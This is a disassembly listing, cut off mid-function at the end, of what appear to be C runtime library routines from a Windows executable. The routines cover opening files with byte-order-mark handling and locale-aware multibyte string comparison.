sub_40E632	proc near		; CODE XREF: sub_40EC70+72p

var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= byte ptr -4
var_3		= byte ptr -3
var_2		= byte ptr -2
var_1		= byte ptr -1
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 28h
		push	ebx
		push	esi
		xor	ebx, ebx
		test	byte ptr [ebp+arg_8], 80h
		push	edi
		push	10h
		mov	esi, eax
		mov	[ebp+var_14], ebx
		mov	[ebp+var_18], ebx
		mov	[ebp+var_2], bl
		mov	[ebp+var_28], 0Ch
		mov	[ebp+var_24], ebx
		pop	edi
		jz	short loc_40E664
		mov	[ebp+var_20], ebx
		mov	[ebp+var_1], 10h
		jmp	short loc_40E66E
; ---------------------------------------------------------------------------

loc_40E664:				; CODE XREF: sub_40E632+27j
		mov	[ebp+var_20], 1
		mov	[ebp+var_1], bl

loc_40E66E:				; CODE XREF: sub_40E632+30j
		lea	eax, [ebp+var_14]
		push	eax
		call	sub_410E49
		test	eax, eax
		pop	ecx
		jz	short loc_40E689
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4033CB
		add	esp, 14h

loc_40E689:				; CODE XREF: sub_40E632+48j
		lea	eax, [ebp+var_18]
		push	eax
		call	sub_407EC6
		test	eax, eax
		pop	ecx
		jz	short loc_40E6A4
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4033CB
		add	esp, 14h

loc_40E6A4:				; CODE XREF: sub_40E632+63j
		mov	eax, 8000h
		test	[ebp+arg_8], eax
		jnz	short loc_40E6C0
		test	[ebp+arg_8], 74000h
		jnz	short loc_40E6BC
		cmp	[ebp+var_14], eax
		jz	short loc_40E6C0

loc_40E6BC:				; CODE XREF: sub_40E632+83j
		or	[ebp+var_1], 80h

loc_40E6C0:				; CODE XREF: sub_40E632+7Aj
					; sub_40E632+88j
		mov	eax, [ebp+arg_8]
		push	3
		pop	edx
		and	eax, edx
		sub	eax, ebx
		mov	ecx, 80000000h
		jz	short loc_40E70F
		dec	eax
		jz	short loc_40E706
		dec	eax
		jz	short loc_40E6FD

loc_40E6D7:				; CODE XREF: sub_40E632+F6j
					; sub_40E632+14Fj ...
		call	sub_405DA6
		mov	[eax], ebx
		or	dword ptr [esi], 0FFFFFFFFh
		call	sub_405D93
		push	16h
		pop	esi
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	[eax], esi
		call	sub_4034C7
		add	esp, 14h
		jmp	loc_40EB8C
; ---------------------------------------------------------------------------

loc_40E6FD:				; CODE XREF: sub_40E632+A3j
		mov	[ebp+var_C], 0C0000000h
		jmp	short loc_40E712
; ---------------------------------------------------------------------------

loc_40E706:				; CODE XREF: sub_40E632+A0j
		mov	[ebp+var_C], 40000000h
		jmp	short loc_40E712
; ---------------------------------------------------------------------------

loc_40E70F:				; CODE XREF: sub_40E632+9Dj
		mov	[ebp+var_C], ecx

loc_40E712:				; CODE XREF: sub_40E632+D2j
					; sub_40E632+DBj
		mov	eax, [ebp+arg_C]
		sub	eax, edi
		jz	short loc_40E74E
		sub	eax, edi
		jz	short loc_40E745
		sub	eax, edi
		jz	short loc_40E73C
		sub	eax, edi
		jz	short loc_40E737
		sub	eax, 40h
		jnz	short loc_40E6D7
		xor	eax, eax
		cmp	[ebp+var_C], ecx
		setz	al
		mov	[ebp+var_8], eax
		jmp	short loc_40E751
; ---------------------------------------------------------------------------

loc_40E737:				; CODE XREF: sub_40E632+F1j
		mov	[ebp+var_8], edx
		jmp	short loc_40E751
; ---------------------------------------------------------------------------

loc_40E73C:				; CODE XREF: sub_40E632+EDj
		mov	[ebp+var_8], 2
		jmp	short loc_40E751
; ---------------------------------------------------------------------------

loc_40E745:				; CODE XREF: sub_40E632+E9j
		mov	[ebp+var_8], 1
		jmp	short loc_40E751
; ---------------------------------------------------------------------------

loc_40E74E:				; CODE XREF: sub_40E632+E5j
		mov	[ebp+var_8], ebx

loc_40E751:				; CODE XREF: sub_40E632+103j
					; sub_40E632+108j ...
		mov	eax, [ebp+arg_8]
		mov	edx, 700h
		and	eax, edx
		mov	ecx, 400h
		cmp	eax, ecx
		jg	short loc_40E7A2
		jz	short loc_40E799
		cmp	eax, ebx
		jz	short loc_40E799
		cmp	eax, 100h
		jz	short loc_40E790
		cmp	eax, 200h
		jz	loc_40E814
		cmp	eax, 300h
		jnz	loc_40E6D7
		mov	[ebp+var_10], 2
		jmp	short loc_40E7BF
; ---------------------------------------------------------------------------

loc_40E790:				; CODE XREF: sub_40E632+13Dj
		mov	[ebp+var_10], 4
		jmp	short loc_40E7BF
; ---------------------------------------------------------------------------

loc_40E799:				; CODE XREF: sub_40E632+132j
					; sub_40E632+136j
		mov	[ebp+var_10], 3
		jmp	short loc_40E7BF
; ---------------------------------------------------------------------------

loc_40E7A2:				; CODE XREF: sub_40E632+130j
		cmp	eax, 500h
		jz	short loc_40E7B8
		cmp	eax, 600h
		jz	short loc_40E814
		cmp	eax, edx
		jnz	loc_40E6D7

loc_40E7B8:				; CODE XREF: sub_40E632+175j
		mov	[ebp+var_10], 1

loc_40E7BF:				; CODE XREF: sub_40E632+15Cj
					; sub_40E632+165j ...
		mov	ecx, [ebp+arg_8]
		mov	eax, 100h
		test	ecx, eax
		mov	edi, 80h
		jz	short loc_40E7E2
		mov	edx, dword_4282D4
		not	edx
		and	edx, [ebp+arg_10]
		test	dl, dl
		js	short loc_40E7E2
		xor	edi, edi
		inc	edi

loc_40E7E2:				; CODE XREF: sub_40E632+19Cj
					; sub_40E632+1ABj
		test	cl, 40h
		jz	short loc_40E7FE
		or	[ebp+var_C], 10000h
		or	edi, 4000000h
		cmp	[ebp+var_18], 2
		jnz	short loc_40E7FE
		or	[ebp+var_8], 4

loc_40E7FE:				; CODE XREF: sub_40E632+1B3j
					; sub_40E632+1C6j
		test	cx, 1000h
		jz	short loc_40E807
		or	edi, eax

loc_40E807:				; CODE XREF: sub_40E632+1D1j
		test	cl, 20h
		jz	short loc_40E81D
		or	edi, 8000000h
		jmp	short loc_40E828
; ---------------------------------------------------------------------------

loc_40E814:				; CODE XREF: sub_40E632+144j
					; sub_40E632+17Cj
		mov	[ebp+var_10], 5
		jmp	short loc_40E7BF
; ---------------------------------------------------------------------------

loc_40E81D:				; CODE XREF: sub_40E632+1D8j
		test	cl, 10h
		jz	short loc_40E828
		or	edi, 10000000h

loc_40E828:				; CODE XREF: sub_40E632+1E0j
					; sub_40E632+1EEj
		call	sub_40F470
		cmp	eax, 0FFFFFFFFh
		mov	[esi], eax
		jnz	short loc_40E84B
		call	sub_405DA6
		mov	[eax], ebx
		or	dword ptr [esi], 0FFFFFFFFh
		call	sub_405D93
		mov	dword ptr [eax], 18h
		jmp	short loc_40E89B
; ---------------------------------------------------------------------------

loc_40E84B:				; CODE XREF: sub_40E632+200j
		mov	eax, [ebp+arg_0]
		push	ebx
		push	edi
		push	[ebp+var_10]
		mov	dword ptr [eax], 1
		lea	eax, [ebp+var_28]
		push	eax
		push	[ebp+var_8]
		push	[ebp+var_C]
		push	[ebp+arg_4]
		call	ds:off_41E06C
		mov	edi, eax
		cmp	edi, 0FFFFFFFFh
		jnz	short loc_40E8A7
		mov	esi, [esi]
		mov	eax, esi
		and	esi, 1Fh
		imul	esi, 28h
		sar	eax, 5
		mov	eax, dword_437700[eax*4]
		lea	eax, [eax+esi+4]
		and	byte ptr [eax],	0FEh

loc_40E88E:				; CODE XREF: sub_40E632+2A2j
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		push	eax
		call	sub_405DB9

loc_40E89A:				; CODE XREF: sub_40E632+345j
		pop	ecx

loc_40E89B:				; CODE XREF: sub_40E632+217j
		call	sub_405D93
		mov	eax, [eax]
		jmp	loc_40EC6B
; ---------------------------------------------------------------------------

loc_40E8A7:				; CODE XREF: sub_40E632+23Fj
		push	edi
		call	ds:dword_41E144	; GetFileType
		cmp	eax, ebx
		jnz	short loc_40E8D6
		mov	esi, [esi]
		mov	eax, esi
		and	esi, 1Fh
		imul	esi, 28h
		sar	eax, 5
		mov	eax, dword_437700[eax*4]
		lea	eax, [eax+esi+4]
		and	byte ptr [eax],	0FEh
		push	edi
		call	ds:off_41E0D8
		jmp	short loc_40E88E
; ---------------------------------------------------------------------------

loc_40E8D6:				; CODE XREF: sub_40E632+27Ej
		cmp	eax, 2
		jnz	short loc_40E8E1
		or	[ebp+var_1], 40h
		jmp	short loc_40E8EA
; ---------------------------------------------------------------------------

loc_40E8E1:				; CODE XREF: sub_40E632+2A7j
		cmp	eax, 3
		jnz	short loc_40E8EA
		or	[ebp+var_1], 8

loc_40E8EA:				; CODE XREF: sub_40E632+2ADj
					; sub_40E632+2B2j
		push	edi
		push	dword ptr [esi]
		call	sub_40F23F
		mov	eax, [esi]
		mov	edx, eax
		and	eax, 1Fh
		imul	eax, 28h
		sar	edx, 5
		mov	edx, dword_437700[edx*4]
		pop	ecx
		pop	ecx
		mov	cl, [ebp+var_1]
		or	cl, 1
		mov	[edx+eax+4], cl
		mov	eax, [esi]
		mov	edx, eax
		and	eax, 1Fh
		imul	eax, 28h
		sar	edx, 5
		mov	edx, dword_437700[edx*4]
		lea	eax, [edx+eax+24h]
		and	byte ptr [eax],	80h
		mov	[ebp+var_3], cl
		and	[ebp+var_3], 48h
		mov	[ebp+var_1], cl
		jnz	loc_40E9BD
		test	cl, 80h
		jz	loc_40EBF7
		test	byte ptr [ebp+arg_8], 2
		jz	short loc_40E9BD
		push	2
		or	edi, 0FFFFFFFFh
		push	edi
		push	dword ptr [esi]
		call	sub_410D1B
		add	esp, 0Ch
		cmp	eax, edi
		mov	[ebp+var_8], eax
		jnz	short loc_40E97C
		call	sub_405DA6
		cmp	dword ptr [eax], 83h
		jz	short loc_40E9BD

loc_40E970:				; CODE XREF: sub_40E632+379j
					; sub_40E632+389j ...
		push	dword ptr [esi]
		call	sub_40900D
		jmp	loc_40E89A
; ---------------------------------------------------------------------------

loc_40E97C:				; CODE XREF: sub_40E632+32Fj
		push	1
		lea	eax, [ebp+var_4]
		push	eax
		push	dword ptr [esi]
		mov	[ebp+var_4], bl
		call	sub_40A36D
		add	esp, 0Ch
		test	eax, eax
		jnz	short loc_40E9AD
		cmp	[ebp+var_4], 1Ah
		jnz	short loc_40E9AD
		mov	eax, [ebp+var_8]
		cdq
		push	edx
		push	eax
		push	dword ptr [esi]
		call	sub_410B67
		add	esp, 0Ch
		cmp	eax, edi
		jz	short loc_40E970

loc_40E9AD:				; CODE XREF: sub_40E632+35Fj
					; sub_40E632+365j
		push	ebx
		push	ebx
		push	dword ptr [esi]
		call	sub_410D1B
		add	esp, 0Ch
		cmp	eax, edi
		jz	short loc_40E970

loc_40E9BD:				; CODE XREF: sub_40E632+305j
					; sub_40E632+318j ...
		test	[ebp+var_1], 80h
		jz	loc_40EBF7
		mov	ecx, 74000h
		test	[ebp+arg_8], ecx
		mov	edi, 4000h
		jnz	short loc_40E9E5
		mov	eax, [ebp+var_14]
		and	eax, ecx
		jnz	short loc_40E9E2
		or	[ebp+arg_8], edi
		jmp	short loc_40E9E5
; ---------------------------------------------------------------------------

loc_40E9E2:				; CODE XREF: sub_40E632+3A9j
		or	[ebp+arg_8], eax

loc_40E9E5:				; CODE XREF: sub_40E632+3A2j
					; sub_40E632+3AEj
		mov	eax, [ebp+arg_8]
		and	eax, ecx
		cmp	eax, edi
		jz	short loc_40EA32
		cmp	eax, 10000h
		jz	short loc_40EA1E
		cmp	eax, 14000h
		jz	short loc_40EA1E
		cmp	eax, 20000h
		jz	short loc_40EA2C
		cmp	eax, 24000h
		jz	short loc_40EA2C
		cmp	eax, 40000h
		jz	short loc_40EA18
		cmp	eax, 44000h
		jnz	short loc_40EA35

loc_40EA18:				; CODE XREF: sub_40E632+3DDj
		mov	[ebp+var_2], 1
		jmp	short loc_40EA35
; ---------------------------------------------------------------------------

loc_40EA1E:				; CODE XREF: sub_40E632+3C1j
					; sub_40E632+3C8j
		mov	ecx, [ebp+arg_8]
		mov	eax, 301h
		and	ecx, eax
		cmp	ecx, eax
		jnz	short loc_40EA35

loc_40EA2C:				; CODE XREF: sub_40E632+3CFj
					; sub_40E632+3D6j
		mov	[ebp+var_2], 2
		jmp	short loc_40EA35
; ---------------------------------------------------------------------------

loc_40EA32:				; CODE XREF: sub_40E632+3BAj
		mov	[ebp+var_2], bl

loc_40EA35:				; CODE XREF: sub_40E632+3E4j
					; sub_40E632+3EAj ...
		test	[ebp+arg_8], 70000h
		jz	loc_40EBF7
		test	[ebp+var_1], 40h
		mov	[ebp+var_8], ebx
		jnz	loc_40EBF7
		mov	eax, [ebp+var_C]
		mov	ecx, 0C0000000h
		and	eax, ecx
		cmp	eax, 40000000h
		jz	loc_40EB1B
		cmp	eax, 80000000h
		jz	short loc_40EAE2
		cmp	eax, ecx
		jnz	loc_40EBF7
		mov	eax, [ebp+var_10]
		cmp	eax, ebx
		jbe	loc_40EBF7
		cmp	eax, 2
		jbe	short loc_40EA91
		cmp	eax, 4
		jbe	short loc_40EAB8

loc_40EA88:				; CODE XREF: sub_40E632+500j
		cmp	eax, 5
		jnz	loc_40EBF7

loc_40EA91:				; CODE XREF: sub_40E632+44Fj
					; sub_40E632+496j ...
		movsx	eax, [ebp+var_2]
		xor	edi, edi
		dec	eax
		jz	loc_40EBC4
		dec	eax
		jnz	loc_40EBF7
		mov	[ebp+var_8], 0FEFFh
		mov	[ebp+var_10], 2
		jmp	loc_40EBD2
; ---------------------------------------------------------------------------

loc_40EAB8:				; CODE XREF: sub_40E632+454j
		push	2
		push	ebx
		push	ebx
		push	dword ptr [esi]
		call	sub_40D27E
		add	esp, 10h
		or	eax, edx
		jz	short loc_40EA91
		push	ebx
		push	ebx
		push	ebx
		push	dword ptr [esi]
		call	sub_40D27E
		and	eax, edx
		add	esp, 10h
		cmp	eax, 0FFFFFFFFh
		jz	loc_40E970

loc_40EAE2:				; CODE XREF: sub_40E632+437j
		push	3
		lea	eax, [ebp+var_8]
		push	eax
		push	dword ptr [esi]
		call	sub_40A36D
		add	esp, 0Ch
		cmp	eax, 0FFFFFFFFh
		jz	loc_40E970
		cmp	eax, 2
		jz	short loc_40EB6B
		cmp	eax, 3
		jnz	loc_40EBB6
		cmp	[ebp+var_8], 0BFBBEFh
		jnz	short loc_40EB6B
		mov	[ebp+var_2], 1
		jmp	loc_40EBF7
; ---------------------------------------------------------------------------

loc_40EB1B:				; CODE XREF: sub_40E632+42Cj
		mov	eax, [ebp+var_10]
		cmp	eax, ebx
		jbe	loc_40EBF7
		cmp	eax, 2
		jbe	loc_40EA91
		cmp	eax, 4
		ja	loc_40EA88
		push	2
		push	ebx
		push	ebx
		push	dword ptr [esi]
		call	sub_40D27E
		add	esp, 10h
		or	eax, edx
		jz	loc_40EA91
		push	ebx
		push	ebx
		push	ebx
		push	dword ptr [esi]
		call	sub_40D27E
		add	esp, 10h
		and	eax, edx

loc_40EB5D:				; CODE XREF: sub_40E632+590j
		cmp	eax, 0FFFFFFFFh
		jnz	loc_40EBF7
		jmp	loc_40E970
; ---------------------------------------------------------------------------

loc_40EB6B:				; CODE XREF: sub_40E632+4CCj
					; sub_40E632+4DEj
		mov	eax, [ebp+var_8]
		and	eax, 0FFFFh
		cmp	eax, 0FFFEh
		jnz	short loc_40EB93
		push	dword ptr [esi]
		call	sub_40900D
		pop	ecx
		call	sub_405D93
		push	16h
		pop	esi
		mov	[eax], esi

loc_40EB8C:				; CODE XREF: sub_40E632+C6j
		mov	eax, esi
		jmp	loc_40EC6B
; ---------------------------------------------------------------------------

loc_40EB93:				; CODE XREF: sub_40E632+546j
		cmp	eax, 0FEFFh
		jnz	short loc_40EBB6
		push	ebx
		push	2
		push	dword ptr [esi]
		call	sub_410D1B
		add	esp, 0Ch
		cmp	eax, 0FFFFFFFFh
		jz	loc_40E970
		mov	[ebp+var_2], 2
		jmp	short loc_40EBF7
; ---------------------------------------------------------------------------

loc_40EBB6:				; CODE XREF: sub_40E632+4D1j
					; sub_40E632+566j
		push	ebx
		push	ebx
		push	dword ptr [esi]
		call	sub_410D1B
		add	esp, 0Ch
		jmp	short loc_40EB5D
; ---------------------------------------------------------------------------

loc_40EBC4:				; CODE XREF: sub_40E632+466j
		mov	[ebp+var_8], 0BFBBEFh
		mov	[ebp+var_10], 3

loc_40EBD2:				; CODE XREF: sub_40E632+481j
					; sub_40E632+5C3j
		mov	eax, [ebp+var_10]
		sub	eax, edi
		push	eax
		lea	eax, [ebp+edi+var_8]
		push	eax
		push	dword ptr [esi]
		call	sub_40D9E0
		add	esp, 0Ch
		cmp	eax, 0FFFFFFFFh
		jz	loc_40E970
		add	edi, eax
		cmp	[ebp+var_10], edi
		jg	short loc_40EBD2

loc_40EBF7:				; CODE XREF: sub_40E632+30Ej
					; sub_40E632+38Fj ...
		mov	eax, [esi]
		mov	ecx, eax
		and	eax, 1Fh
		imul	eax, 28h
		sar	ecx, 5
		mov	ecx, dword_437700[ecx*4]
		lea	eax, [ecx+eax+24h]
		mov	cl, [eax]
		xor	cl, [ebp+var_2]
		and	cl, 7Fh
		xor	[eax], cl
		mov	eax, [esi]
		mov	ecx, eax
		and	eax, 1Fh
		imul	eax, 28h
		sar	ecx, 5
		mov	ecx, dword_437700[ecx*4]
		lea	eax, [ecx+eax+24h]
		mov	ecx, [ebp+arg_8]
		mov	dl, [eax]
		shr	ecx, 10h
		shl	cl, 7
		and	dl, 7Fh
		or	cl, dl
		cmp	[ebp+var_3], bl
		mov	[eax], cl
		jnz	short loc_40EC69
		test	byte ptr [ebp+arg_8], 8
		jz	short loc_40EC69
		mov	esi, [esi]
		mov	eax, esi
		and	esi, 1Fh
		imul	esi, 28h
		sar	eax, 5
		mov	eax, dword_437700[eax*4]
		lea	eax, [eax+esi+4]
		or	byte ptr [eax],	20h

loc_40EC69:				; CODE XREF: sub_40E632+614j
					; sub_40E632+61Aj
		mov	eax, ebx

loc_40EC6B:				; CODE XREF: sub_40E632+270j
					; sub_40E632+55Cj
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_40E632	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40EC70	proc near		; CODE XREF: sub_40ED3C+14p

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch

		push	14h
		push	offset dword_422DD0
		call	__SEH_prolog4
		xor	esi, esi
		mov	[ebp+var_1C], esi
		xor	eax, eax
		mov	edi, [ebp+arg_10]
		cmp	edi, esi
		setnz	al
		cmp	eax, esi
		jnz	short loc_40ECAA

loc_40EC8F:				; CODE XREF: sub_40EC70+47j
					; sub_40EC70+5Bj
		call	sub_405D93
		push	16h
		pop	edi
		mov	[eax], edi
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4034C7
		add	esp, 14h
		mov	eax, edi
		jmp	short loc_40ED03
; ---------------------------------------------------------------------------

loc_40ECAA:				; CODE XREF: sub_40EC70+1Dj
		or	dword ptr [edi], 0FFFFFFFFh
		xor	eax, eax
		cmp	[ebp+arg_0], esi
		setnz	al
		cmp	eax, esi
		jz	short loc_40EC8F
		cmp	[ebp+arg_14], esi
		jz	short loc_40ECCD
		mov	eax, [ebp+arg_C]
		and	eax, 0FFFFFE7Fh
		neg	eax
		sbb	eax, eax
		inc	eax
		jz	short loc_40EC8F

loc_40ECCD:				; CODE XREF: sub_40EC70+4Cj
		mov	[ebp+ms_exc.disabled], esi
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		lea	eax, [ebp+var_1C]
		push	eax
		mov	eax, edi
		call	sub_40E632
		add	esp, 14h
		mov	[ebp+var_20], eax
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40ED0E
		mov	eax, [ebp+var_20]
		cmp	eax, esi
		jz	short loc_40ED03
		or	dword ptr [edi], 0FFFFFFFFh

loc_40ED03:				; CODE XREF: sub_40EC70+38j
					; sub_40EC70+8Ej
		call	__SEH_epilog4
		retn
sub_40EC70	endp


; =============== S U B	R O U T	I N E =======================================



sub_40ED09	proc near		; DATA XREF: jlrllt49:00422DE8o
		xor	esi, esi
		mov	edi, [ebp+18h]
sub_40ED09	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40ED0E	proc near		; CODE XREF: sub_40EC70+84p
		cmp	[ebp-1Ch], esi
		jz	short locret_40ED3B
		cmp	[ebp-20h], esi
		jz	short loc_40ED33
		mov	eax, [edi]
		mov	ecx, eax
		sar	ecx, 5
		and	eax, 1Fh
		imul	eax, 28h
		mov	ecx, dword_437700[ecx*4]
		lea	eax, [ecx+eax+4]
		and	byte ptr [eax],	0FEh

loc_40ED33:				; CODE XREF: sub_40ED0E+8j
		push	dword ptr [edi]
		call	sub_40F44E
		pop	ecx

locret_40ED3B:				; CODE XREF: sub_40ED0E+3j
		retn
sub_40ED0E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40ED3C	proc near		; CODE XREF: sub_4087BF+26Dp

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		push	1
		push	[ebp+arg_0]
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		call	sub_40EC70
		add	esp, 18h
		pop	ebp
		retn
sub_40ED3C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40ED5A	proc near		; CODE XREF: sub_40EF74+Ap

var_14		= byte ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= byte ptr -8
var_4		= byte ptr -4
var_3		= byte ptr -3
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 14h
		push	esi
		push	[ebp+arg_8]
		lea	ecx, [ebp+var_14]
		call	sub_402CAD
		mov	edx, [ebp+arg_0]
		xor	esi, esi
		cmp	edx, esi
		jnz	short loc_40EDA4
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		cmp	[ebp+var_8], 0
		jz	short loc_40ED9A
		mov	eax, [ebp+var_C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40ED9A:				; CODE XREF: sub_40ED5A+37j
		mov	eax, 7FFFFFFFh
		jmp	loc_40EF71
; ---------------------------------------------------------------------------

loc_40EDA4:				; CODE XREF: sub_40ED5A+19j
		push	ebx
		mov	ebx, [ebp+arg_4]
		cmp	ebx, esi
		jnz	short loc_40EDDB
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		cmp	[ebp+var_8], 0
		jz	short loc_40EDD1
		mov	eax, [ebp+var_C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40EDD1:				; CODE XREF: sub_40ED5A+6Ej
		mov	eax, 7FFFFFFFh
		jmp	loc_40EF70
; ---------------------------------------------------------------------------

loc_40EDDB:				; CODE XREF: sub_40ED5A+50j
		mov	eax, [ebp+var_10]
		cmp	[eax+8], esi
		jnz	short loc_40EE07
		lea	eax, [ebp+var_14]
		push	eax
		push	ebx
		push	edx
		call	sub_402D64
		add	esp, 0Ch
		cmp	[ebp+var_8], 0
		jz	loc_40EF70
		mov	ecx, [ebp+var_C]
		and	dword ptr [ecx+70h], 0FFFFFFFDh
		jmp	loc_40EF70
; ---------------------------------------------------------------------------

loc_40EE07:				; CODE XREF: sub_40ED5A+87j
		push	edi
		mov	edi, 200h

loc_40EE0D:				; CODE XREF: sub_40ED5A+1CDj
		movzx	cx, byte ptr [edx]
		movzx	ecx, cx
		movzx	esi, cl
		inc	edx
		test	byte ptr [esi+eax+1Dh],	4
		mov	[ebp+arg_0], edx
		jz	short loc_40EE7B
		cmp	byte ptr [edx],	0
		jnz	short loc_40EE2B
		xor	esi, esi
		jmp	short loc_40EE97
; ---------------------------------------------------------------------------

loc_40EE2B:				; CODE XREF: sub_40ED5A+CBj
		push	1
		push	dword ptr [eax+4]
		lea	ecx, [ebp+var_4]
		push	2
		push	ecx
		push	2
		dec	edx
		push	edx
		push	edi
		push	dword ptr [eax+0Ch]
		lea	eax, [ebp+var_14]
		push	eax
		call	sub_40C8B9
		add	esp, 24h
		cmp	eax, 1
		jnz	short loc_40EE56
		movzx	ax, [ebp+var_4]
		jmp	short loc_40EE70
; ---------------------------------------------------------------------------

loc_40EE56:				; CODE XREF: sub_40ED5A+F3j
		cmp	eax, 2
		jnz	loc_40EF2C
		movzx	ax, [ebp+var_4]
		movzx	cx, [ebp+var_3]
		shl	ax, 8
		add	ax, cx

loc_40EE70:				; CODE XREF: sub_40ED5A+FAj
		inc	[ebp+arg_0]
		movzx	esi, ax
		mov	eax, [ebp+var_10]
		jmp	short loc_40EE97
; ---------------------------------------------------------------------------

loc_40EE7B:				; CODE XREF: sub_40ED5A+C6j
		movzx	edx, cx
		lea	ecx, [edx+eax]
		test	byte ptr [ecx+1Dh], 10h
		jz	short loc_40EE94
		movzx	cx, byte ptr [ecx+11Dh]
		movzx	esi, cx
		jmp	short loc_40EE97
; ---------------------------------------------------------------------------

loc_40EE94:				; CODE XREF: sub_40ED5A+12Bj
		movzx	esi, dx

loc_40EE97:				; CODE XREF: sub_40ED5A+CFj
					; sub_40ED5A+11Fj ...
		movzx	cx, byte ptr [ebx]
		movzx	ecx, cx
		movzx	edx, cl
		inc	ebx
		test	byte ptr [edx+eax+1Dh],	4
		jz	short loc_40EEFE
		cmp	byte ptr [ebx],	0
		jnz	short loc_40EEB2
		xor	ecx, ecx
		jmp	short loc_40EF1A
; ---------------------------------------------------------------------------

loc_40EEB2:				; CODE XREF: sub_40ED5A+152j
		push	1
		push	dword ptr [eax+4]
		lea	ecx, [ebp+var_4]
		push	2
		push	ecx
		push	2
		lea	ecx, [ebx-1]
		push	ecx
		push	edi
		push	dword ptr [eax+0Ch]
		lea	eax, [ebp+var_14]
		push	eax
		call	sub_40C8B9
		add	esp, 24h
		cmp	eax, 1
		jnz	short loc_40EEDF
		movzx	ax, [ebp+var_4]
		jmp	short loc_40EEF5
; ---------------------------------------------------------------------------

loc_40EEDF:				; CODE XREF: sub_40ED5A+17Cj
		cmp	eax, 2
		jnz	short loc_40EF2C
		movzx	ax, [ebp+var_4]
		movzx	cx, [ebp+var_3]
		shl	ax, 8
		add	ax, cx

loc_40EEF5:				; CODE XREF: sub_40ED5A+183j
		movzx	ecx, ax
		mov	eax, [ebp+var_10]
		inc	ebx
		jmp	short loc_40EF1A
; ---------------------------------------------------------------------------

loc_40EEFE:				; CODE XREF: sub_40ED5A+14Dj
		movzx	edx, cx
		lea	ecx, [edx+eax]
		test	byte ptr [ecx+1Dh], 10h
		jz	short loc_40EF17
		movzx	cx, byte ptr [ecx+11Dh]
		movzx	ecx, cx
		jmp	short loc_40EF1A
; ---------------------------------------------------------------------------

loc_40EF17:				; CODE XREF: sub_40ED5A+1AEj
		movzx	ecx, dx

loc_40EF1A:				; CODE XREF: sub_40ED5A+156j
					; sub_40ED5A+1A2j ...
		cmp	cx, si
		jnz	short loc_40EF4B
		test	si, si
		jz	short loc_40EF60
		mov	edx, [ebp+arg_0]
		jmp	loc_40EE0D
; ---------------------------------------------------------------------------

loc_40EF2C:				; CODE XREF: sub_40ED5A+FFj
					; sub_40ED5A+188j
		call	sub_405D93
		mov	dword ptr [eax], 16h
		cmp	[ebp+var_8], 0
		jz	short loc_40EF44
		mov	eax, [ebp+var_C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40EF44:				; CODE XREF: sub_40ED5A+1E1j
		mov	eax, 7FFFFFFFh
		jmp	short loc_40EF6F
; ---------------------------------------------------------------------------

loc_40EF4B:				; CODE XREF: sub_40ED5A+1C3j
		sbb	eax, eax
		and	eax, 2
		dec	eax
		cmp	[ebp+var_8], 0
		jz	short loc_40EF6F
		mov	ecx, [ebp+var_C]
		and	dword ptr [ecx+70h], 0FFFFFFFDh
		jmp	short loc_40EF6F
; ---------------------------------------------------------------------------

loc_40EF60:				; CODE XREF: sub_40ED5A+1C8j
		cmp	[ebp+var_8], 0
		jz	short loc_40EF6D
		mov	eax, [ebp+var_C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40EF6D:				; CODE XREF: sub_40ED5A+20Aj
		xor	eax, eax

loc_40EF6F:				; CODE XREF: sub_40ED5A+1EFj
					; sub_40ED5A+1FBj ...
		pop	edi

loc_40EF70:				; CODE XREF: sub_40ED5A+7Cj
					; sub_40ED5A+9Bj ...
		pop	ebx

loc_40EF71:				; CODE XREF: sub_40ED5A+45j
		pop	esi
		leave
		retn
sub_40ED5A	endp


; =============== S U B	R O U T	I N E =======================================



sub_40EF74	proc near		; CODE XREF: sub_4087BF+1E6p
					; sub_4087BF+203p ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	0
		push	[esp+4+arg_4]
		push	[esp+8+arg_0]
